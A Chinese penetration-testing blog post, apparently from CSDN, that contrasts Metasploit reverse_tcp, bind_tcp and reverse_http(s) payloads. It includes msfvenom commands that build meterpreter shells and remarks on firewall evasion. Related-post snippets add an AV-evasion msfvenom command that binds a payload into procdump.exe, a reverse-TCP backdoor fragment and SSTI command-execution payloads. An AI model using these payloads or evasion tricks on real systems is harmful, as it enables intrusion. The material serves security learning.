msf的reverse_tcp和bind_tcp两者的区别

最新推荐文章于 2024-04-29 16:13:16 发布
最新推荐文章于 2024-04-29 16:13:16 发布
阅读量5.7k 收藏 20
点赞数 6
分类专栏: 内网 web 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/119263733
版权
web 同时被 2 个专栏收录
25 篇文章 4 订阅
订阅专栏
内网
10 篇文章 1 订阅
订阅专栏

msf的reverse_tcp和bind_tcp两者的区别

reverse_tcp

攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444  -f elf -o shell

bind_tcp

攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。

基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。
例:

msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444  -f elf -o shell

reverse_http

基于http方式的反向连接,在网速慢的情况下不稳定。

reverse_https

基于https方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成443试试

msfvenom -p windows/meterpreter/reverse_https lport=4444  -f elf -o shell

安全性

采用reverse的方法一般较为安全,因为是在测试机连接攻击机,所以一般不会被防火墙发现;而bind在测试机打开端口时很容易被安全软件和防火墙发现

HoAd's blog
关注
  • 6
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
deeplink-reverse-tcp:使用简单的Metasploit reverse_tcp有效负载,Microsoft Word和SettingContent-ms文件获得反向连接
05-24
反向链接 需要的东西:Microsoft word(最好是较旧的版本),notepad / notepad ++,Kali vm,Windows reverse_tcp负载和Windows机器 创建有效负载+命令和控制服务器设置 在Kali Linux中创建Windows / Meterpreter / reverse_tcp有效负载 启动Apache服务器 将payload.exe推送到var / www / html 在Windows中修改SettingContent-ms文件 打开记事本/记事本++,然后复制粘贴ILoveWindows.SettingContent-ms 用您的kali本地ip和有效负载可执行文件名称替换“ ” 保存 在Microsoft Word中插入SettingContent-ms文件 打开Microsoft Word,然后转到“插入”->“对象”->
[原创]K8 MSF Bind Shell TCP 连接工具-附件资源
03-05
[原创]K8 MSF Bind Shell TCP 连接工具-附件资源
metasploit中Payload的reverse_tcpbind_tcp区别
热门推荐
04-19 1万+
bind_tcpreverse_tcp这两者的执行过程可以d
msf linux/x64/meterpreter/bind_tcp记录实践
want的博客
10-07 1797
1.设置监听,从tcp的角度来,要服务端先启动,客户端才能连接. 生成payload,赋权并执行 root@kali:~# msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=223 -f elf>x [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x
[原创]K8 MSF Bind Shell TCP 连接工具
weixin_30562507的博客
01-12 353
工具:K8_MSFBindShellClient_20170524[K.8]编译:自己查壳组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2017/5/241:51:02简介:MSF Bind Shell TCP Client 无需安装MSF环境,连接msf绑定shell图片: 功能:下载地址文件...
利用msf工具制作反向木马渗透
最新发布
qq_61415450的博客
04-29 232
利用msf工具制作反向木马渗透
achat_reverse_tcp_exploit:在AChat 0.150 Beta 7 Windows 7810 x86x64上测试
05-14
AChat-Reverse-TCP-Exploit 在AChat 0.150 Beta 7 Windows 7/8/10 x86 / x64上测试 示例: : 您必须使用MSF multi / handler捕获外壳 msf exploit(multi / handler)>运行 [*]在192.168.1.206:4443上启动了反向...
MSF Toolkit_zip_
10-03
【标题】"MSF Toolkit_zip_" 指的是Metasploit Framework的一个工具包,它被压缩成ZIP格式以便于分发和使用。Metasploit Framework(简称MSF)是一个广泛使用的开源安全测试平台,用于执行渗透测试和漏洞评估。这个...
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
MFS(Mobile TV File System)和MSF(Media Service Format)都是为了适应移动环境下的数据传输和播放而创建的。MFS格式通常包含视频、音频和元数据,而MSF则可能涉及更复杂的服务信息,如电子节目指南(EPG)和数据...
VB-shujuku.rar_VB_vb MSF SHUJUKU
09-22
标题中的"VB-shujuku.rar_VB_vb MSF SHUJUKU"表明这是一个与Visual Basic(VB)相关的数据库教程或示例项目,其中可能包含如何利用VB与数据库进行交互的代码和实例。MSF(Microsoft Solutions Framework)在这里可能...
Reverse_TCP_Program:用python编写的反向TCP程序
03-22
反向TCP程序 用python编写的反向TCP程序
reverse-tunnel:反向隧道TCP和UDP
05-06
反向隧道TCP和UDP rtun是用于通过公共网关服务器将TCP和UDP端口公开给Internet的工具。 您可以在防火墙和NAT之后的计算机上公开ssh和mosh服务器。 建造 中提供了已编译的二进制文件。 要构建自己的存储库,请克隆存储库并进行以下操作: $ git clone https://github.com/snsinfu/reverse-tunnel $ cd reverse-tunnel $ make 或者, $ go build -o rtun github.com/snsinfu/reverse-tunnel/agent/cmd $ go build -o rtun-server github.com/snsinfu/reverse-tunnel/server/cmd 码头工人 Docker映像可用: 快速使用: $ docker run -it \ -
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
Golang实现的x86下的Meterpreter reverse tcp
BaCde's Blog
03-18 212
Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter 做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。 使用方法 修改go_meterpreter.go中125行代码 s := “http://...
java reverse 怎么实现_JAVA 后门 shell_reverse_tcp 实现
weixin_32021519的博客
02-24 463
遇到情景是可以在android上安装任意apk,执行apk后有个反弹shell的效果。一般来说直接用msf就可以生成android后门,但不知为何在目标设备上无法正常使用,故决定自己编写一个简单的apk以完成反弹shell。最终实现三个纯JAVA版的shell_reverse_tcp,当然塞进apk也好使。开始自己完成了一个无法完全交互的shell,类似一句话木马那种伪tty。因为思路也是web的...
ReverseTcpshell使用教程
m0_53087192的博客
03-11 481
测试环境 攻击机:192.168.50.100 windows10 被攻击:192.168.50.101 windows server 2016 生成payload 使用powershellReverseTCP.ps1运行 设置监听ip,端口 生成两种payload,一种powershell,一种cmd。 复制一个payload,在被攻击机上运行,返回shell。 火绒全程无反应。 ...
用Python写Reverse TCP 后门
IsTr33叨逼叨
11-09 420
看见一个老外用Python写的Reverse TCP后门。 小小修改了一下,让它支持Windows。 reverseTcp.py: #!/usr/bin/env python import socket, sys host = sys.argv[1] # Attacker's host address, usually '' port = int(sys.argv
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 9709
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
在kali Linux中进行msf免杀实验时,使用测试编码并绑定微软官方工具procdump,使用官方procdump做实验 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 134.134 LPORT=8888 -e x86/shikata_ga_nai -x procdump.exe -i 20 -f exe -o flash3.exe应该怎么改
05-05
如果你想进行msf免杀实验,并使用procdump.exe作为载体来绑定恶意代码,可以使用以下命令: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.134.134 LPORT=8888 -x procdump.exe -k -e x86/shikata_ga_nai -i 20 -f exe -o flash3.exe ``` 其中,`-k`参数用于保持进程执行,直到meterpreter session被开启。这个参数在绑定时非常重要,因为它确保了procdump.exe进程继续执行,而不会在绑定后立即停止。这样可以确保你的payload成功植入目标机器并得到执行。 你还可以尝试其他的msfvenom参数,以便更好地适应你的实验环境和目标机器。例如,你可以使用msfvenom的`-b`参数来指定bad characters,也可以使用`-a`参数来指定目标机器的架构。请根据需要进行更改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值